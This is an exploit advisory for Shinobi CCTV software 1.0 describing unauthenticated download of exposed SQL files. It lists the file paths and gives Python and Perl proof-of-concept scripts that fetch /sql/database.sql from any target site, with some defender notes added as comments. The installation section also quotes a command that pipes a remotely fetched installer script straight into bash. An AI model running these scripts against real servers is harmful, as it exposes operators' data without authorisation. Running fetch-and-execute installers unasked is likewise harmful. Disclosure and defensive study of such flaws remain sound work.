1###########################################################################
2
3# Exploit Title : Shinobi Security Software 1.0 Database Disclosure Exploit
4# Author [ Discovered By ] : KingSkrupellos
5# Team : Cyberizm Digital Security Army
6# Date : 02/04/2019
7# Vendor Homepage : shinobi.video
8# Software Download Link : github.com/moeiscool/Shinobi/archive/master.zip
9# Software Information Link : shinobi.video/docs/
10gitlab.com/Shinobi-Systems/ShinobiCE
11github.com/moeiscool/Shinobi
12# Software Version : 1.0 and latest version
13# Tested On : Windows and Linux
14# Category : WebApps
15# Exploit Risk : Medium
16# Vulnerability Type :
17CWE-200 [ Information Exposure ]
18CWE-538 [ File and Directory Information Exposure ]
19# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
20# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
21# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
22# Acunetix Information Link about => phpMyAdmin SQL dump Web Vulnerability
23acunetix.com/vulnerabilities/web/phpmyadmin-sql-dump/
24
25###########################################################################
26
27# Description about Software :
28***************************
Shinobi is Open Source, written in Node.js, and real easy to use. It is the future of CCTV and NVR for developers and end-users alike. It is catered to by professionals and most importantly by the one who created it. Shinobi Community Edition (CE) is a GPLv3+AGPLv3 release of Shinobi. The Free Open Source CCTV platform written in Node.JS (Camera Recorder - Security Surveillance Software - Restreamer).
38
39###########################################################################
40
41# Impact :
42***********
43* The product stores sensitive information in files or directories that are accessible
44
45to actors outside of the intended control sphere.
46
47* An information exposure is the intentional or unintentional disclosure of information
48
49to an actor that is not explicitly authorized to have access to that information.
50
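* phpMyAdmin is a free software tool written in PHP, intended to handle the administration of MySQL over the World Wide Web. It can be used to dump a database or a collection of databases for backup or transfer to another SQL server (not necessarily a MySQL server). The dump typically contains SQL statements to create the table, populate it, or both. This file contains a phpMyAdmin SQL dump. This information is highly sensitive and should not be found on a production system.

* Note that the header of the /sql/database.sql excerpt quoted below names HeidiSQL, not phpMyAdmin, as the export tool and states "Data exporting was unselected", so that excerpt holds schema statements only. What is actually exposed on a given installation depends on the contents of the .sql files it serves. Administrators can check their own deployment by confirming that the paths listed under "File" are not reachable over HTTP and by reviewing web server access logs for requests to them.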
62
63Installation :
64***********
65Fast Install (The Ninja Way)
66
67
68Become root to use the installer and run Shinobi.
69
70Use one of the following to do so.
71
72Ubuntu 17.04, 17.10
73
74sudo su
75
76
77CentOS 7
78
79su
80
81
82MacOS 10.7(+)
83
84su
85
86
87
88
89
Download and run the installer.

bash <(curl -s https://gitlab.com/Shinobi-Systems/Shinobi-Installer/raw/master/shinobi-install.sh)
98
99Elaborate Installs
Installation Tutorials - http://shinobi.video/docs/start
103Troubleshooting Guide - http://shinobi.video/docs/start#trouble-section
104
105###########################################################################
106
107File :
108*****
109/sql/database.sql
110/default_data.sql
111/framework.sql
112/tables.sql
113/update-1-1-2017.sql
114/update-13-7-2017.sql
115/update-17-5-2017.sql
116/update-2-2-2017.sql
117/update-26-08-2017.sql
118/update-5-6-2017.sql
119/user.sql
120
121/sql/docker/01-framework.sql
122
123/sql/postgresql/default_data.sql
124/sql/postgresql/framework.sql
125/sql/postgresql/user.sql
126
127/sql/mssql/default_data.sql
128/sql/mssql/framework.sql
129/sql/mssql/user.sql
130
131/sql/sqlite3/framework.sql
132
133Information : [ /sql/database.sql ]
134*********************************
135-- --------------------------------------------------------
136-- Host: Host IP Address
137-- Server version: 5.7.17-0ubuntu0.16.04.1 - (Ubuntu)
138-- Server OS: Linux
139-- HeidiSQL Version: 9.3.0.4984
140-- --------------------------------------------------------
141
142/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;
143/*!40101 SET NAMES utf8mb4 */;
144/*!40014 SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0 */;
145/*!40101 SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='NO_AUTO_VALUE_ON_ZERO' */;
146
147-- Dumping database structure for ccio
148CREATE DATABASE IF NOT EXISTS `ccio` /*!40100 DEFAULT CHARACTER SET utf8 */;
149USE `ccio`;
150
151-- Data exporting was unselected.
152/*!40101 SET SQL_MODE=IFNULL(@OLD_SQL_MODE, '') */;
153/*!40014 SET FOREIGN_KEY_CHECKS=IF(@OLD_FOREIGN_KEY_CHECKS IS NULL, 1, @OLD_FOREIGN_KEY_CHECKS) */;
154/*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */;
155
156###########################################################################
157
158# Database Disclosure Information Exposure Exploit 1 :
159***********************************************
#!/usr/bin/python
# Proof-of-concept check from the advisory (Python 2: urllib2, raw_input and
# the print statement). It sends one unauthenticated HTTP GET for
# <URL>/sql/database.sql and prints the fragments of the response body that
# match a fixed pattern.
#
# Defender notes:
#   * The request carries no credentials; if it returns the file, the .sql
#     file is reachable over HTTP without authentication.
#   * urllib2 sends a "Python-urllib/<version>" User-Agent unless overridden,
#     so unmodified runs stand out in access logs next to the
#     /sql/database.sql path.
import string
import re
from urllib2 import Request, urlopen

DUMP_PATH = "/sql/database.sql"

# The base URL is taken verbatim from the operator; nothing is validated.
base_url = raw_input ("URL: ")
response = urlopen(Request(base_url + DUMP_PATH))
print "Result"
body = response.read()
# The pattern is unanchored, so every "resources..." fragment in the body is
# collected; the list is printed in its str() form.
print str(re.findall("resources.*=*", body))
# Bare name, not a call: this statement does nothing and the script simply
# runs off the end.
exit
173
174###########################################################################
175
176# Database Disclosure Information Exposure Exploit 2 :
177***********************************************
#!/usr/bin/perl -w
# Author : KingSkrupellos
# Team : Cyberizm Digital Security Army
#
# Proof-of-concept from the advisory: one unauthenticated HTTP GET for
# http://<host><path>sql/database.sql, with the response body written to a
# fixed local file.
#
# Defender notes:
#   * "Success" below means only that the server answered with a 2xx status
#     (is_success); the script never inspects the body, so an error page
#     served with status 200 is reported as a hit too.
#   * LWP::UserAgent sends a "libwww-perl/<version>" User-Agent by default,
#     which together with the sql/database.sql path makes unmodified runs
#     easy to find in web server access logs.
#   * If the request succeeds against your own deployment, the .sql file is
#     reachable without authentication; remove or deny web access to the
#     sql/ directory.

use LWP::Simple;
use LWP::UserAgent;

# Prints the two usage examples. Defined ahead of its call site so the empty
# prototype is already known when the call is compiled.
sub help()
{
    print "[+] usage1 : perl $0 site.com /path/ \n";
    print "[+] usage2 : perl $0 localhost / \n";
}

# Each string is executed as an external command. 'cls' and 'color a' are
# Windows console commands; the middle entry is the banner text, which is
# run as a command rather than displayed.
system($_) for (
    'cls',
    'Shinobi Security Software 1.0 Database Disclosure Exploit',
    'color a',
);

unless (@ARGV >= 2) {
    print "[-]How To Use\n\n";
    help();
    exit();
}

# A third command-line argument, if given, is ignored: the file name is fixed.
my ($host, $base_path) = @ARGV;
my $dump_name = "sql/database.sql";
my $url = "http://" . $host . $base_path . $dump_name;
print "\n Wait Please Dear Hacker!!! \n\n";

# :content_file makes LWP write the response body to this hard-coded path.
my $ua = LWP::UserAgent->new();
my $response = $ua->get($url, ":content_file" => "D:/sql/database.sql");

if (!$response->is_success) {
    print "[!] Exploiting $url Failed !\n[!] ".$response->status_line."\n";
}
else {
    print "[+] $url Exploited!\n\n";
    print "[+] Database saved to D:/sql/database.sql\n";
}
exit();
220
221###########################################################################
222
223# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
224
225###########################################################################